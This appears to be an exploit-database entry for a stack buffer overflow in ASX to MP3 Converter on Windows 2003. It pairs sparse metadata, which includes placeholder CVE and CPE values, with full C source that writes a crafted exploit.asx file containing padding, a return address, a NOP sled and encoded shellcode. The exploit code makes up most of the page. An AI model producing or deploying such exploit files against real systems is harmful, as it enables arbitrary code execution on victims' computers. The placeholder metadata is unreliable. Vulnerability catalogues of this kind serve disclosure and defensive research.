ASX to MP3 Converter Buffer Overflow

vendor:

ASX to MP3 Converter

by:

Ivan Ivanovic Ivanov

9.8

CVSS

CRITICAL

Buffer Overflow

CWE

Product Name: ASX to MP3 Converter

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: CVE-xxxx-xxxx

CPE: cpe:xxxx:asx_to_mp3_converter

Metasploit:

Other Scripts:

Platforms Tested: Windows 2003

Unknown

ASX to MP3 Converter Buffer Overflow

This exploit demonstrates a buffer overflow vulnerability in ASX to MP3 Converter. By sending a specially crafted ASX file, an attacker can overwrite the memory and execute arbitrary code. This exploit is for Windows 2003.

Mitigation:

To mitigate this vulnerability, it is recommended to update ASX to MP3 Converter to the latest version or apply the vendor's patch if available.

Source

Exploit-DB raw data:

/*
ASX to MP3 Converter SOF - Ivan Ivanovic Ivanov Иван-дурак
недействительный 31337 Team
holahola ~ https://www.exploit-db.com/exploits/38382/
Winblows 2k3
*/

#include <stdio.h>
#include <windows.h>
#include <malloc.h>

int main() {

    int i;
    char *overwrite_offset = malloc(255);
    for(i = 0; i < 255; i += 5) {
        char padding[] = "\x41\x41\x41\x41\x41"; 
        memcpy(overwrite_offset + i, padding, strlen(padding));
    }
    memset(overwrite_offset + _msize(overwrite_offset) - 1, 0x00, 1);

    char retn[] = "\x92\x72\x23\x74";
    char shellcode[] = 
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP sled
    "\xdb\xc8\xd9\x74\x24\xf4\xbd\xaf\x93\x43\xb4\x5e\x31\xc9\xb1"
    "\x52\x31\x6e\x17\x83\xee\xfc\x03\xc1\x80\xa1\x41\xe1\x4f\xa7"
    "\xaa\x19\x90\xc8\x23\xfc\xa1\xc8\x50\x75\x91\xf8\x13\xdb\x1e"
    "\x72\x71\xcf\x95\xf6\x5e\xe0\x1e\xbc\xb8\xcf\x9f\xed\xf9\x4e"
    "\x1c\xec\x2d\xb0\x1d\x3f\x20\xb1\x5a\x22\xc9\xe3\x33\x28\x7c"
    "\x13\x37\x64\xbd\x98\x0b\x68\xc5\x7d\xdb\x8b\xe4\xd0\x57\xd2"
    "\x26\xd3\xb4\x6e\x6f\xcb\xd9\x4b\x39\x60\x29\x27\xb8\xa0\x63"
    "\xc8\x17\x8d\x4b\x3b\x69\xca\x6c\xa4\x1c\x22\x8f\x59\x27\xf1"
    "\xed\x85\xa2\xe1\x56\x4d\x14\xcd\x67\x82\xc3\x86\x64\x6f\x87"
    "\xc0\x68\x6e\x44\x7b\x94\xfb\x6b\xab\x1c\xbf\x4f\x6f\x44\x1b"
    "\xf1\x36\x20\xca\x0e\x28\x8b\xb3\xaa\x23\x26\xa7\xc6\x6e\x2f"
    "\x04\xeb\x90\xaf\x02\x7c\xe3\x9d\x8d\xd6\x6b\xae\x46\xf1\x6c"
    "\xd1\x7c\x45\xe2\x2c\x7f\xb6\x2b\xeb\x2b\xe6\x43\xda\x53\x6d"
    "\x93\xe3\x81\x22\xc3\x4b\x7a\x83\xb3\x2b\x2a\x6b\xd9\xa3\x15"
    "\x8b\xe2\x69\x3e\x26\x19\xfa\xed\xa7\x55\x71\x85\xc5\x95\x84"
    "\xed\x43\x73\xec\x01\x02\x2c\x99\xb8\x0f\xa6\x38\x44\x9a\xc3"
    "\x7b\xce\x29\x34\x35\x27\x47\x26\xa2\xc7\x12\x14\x65\xd7\x88"
    "\x30\xe9\x4a\x57\xc0\x64\x77\xc0\x97\x21\x49\x19\x7d\xdc\xf0"
    "\xb3\x63\x1d\x64\xfb\x27\xfa\x55\x02\xa6\x8f\xe2\x20\xb8\x49"
    "\xea\x6c\xec\x05\xbd\x3a\x5a\xe0\x17\x8d\x34\xba\xc4\x47\xd0"
    "\x3b\x27\x58\xa6\x43\x62\x2e\x46\xf5\xdb\x77\x79\x3a\x8c\x7f"
    "\x02\x26\x2c\x7f\xd9\xe2\x5c\xca\x43\x42\xf5\x93\x16\xd6\x98"
    "\x23\xcd\x15\xa5\xa7\xe7\xe5\x52\xb7\x82\xe0\x1f\x7f\x7f\x99"
    "\x30\xea\x7f\x0e\x30\x3f";

    int buffer_size = _msize(overwrite_offset) + strlen(retn) + strlen(shellcode);
    char *buffer = malloc(buffer_size);

    memcpy(buffer, overwrite_offset, _msize(overwrite_offset));
    memcpy(buffer + _msize(overwrite_offset), retn, strlen(retn));
    memcpy(buffer + _msize(overwrite_offset) + strlen(retn), shellcode, strlen(shellcode));
    memset(buffer + buffer_size - 1, 0x00, 1);

    FILE * fp;
    fp = fopen("exploit.asx","w");
    fprintf(fp, buffer); 
    fclose(fp);

    return 0;

}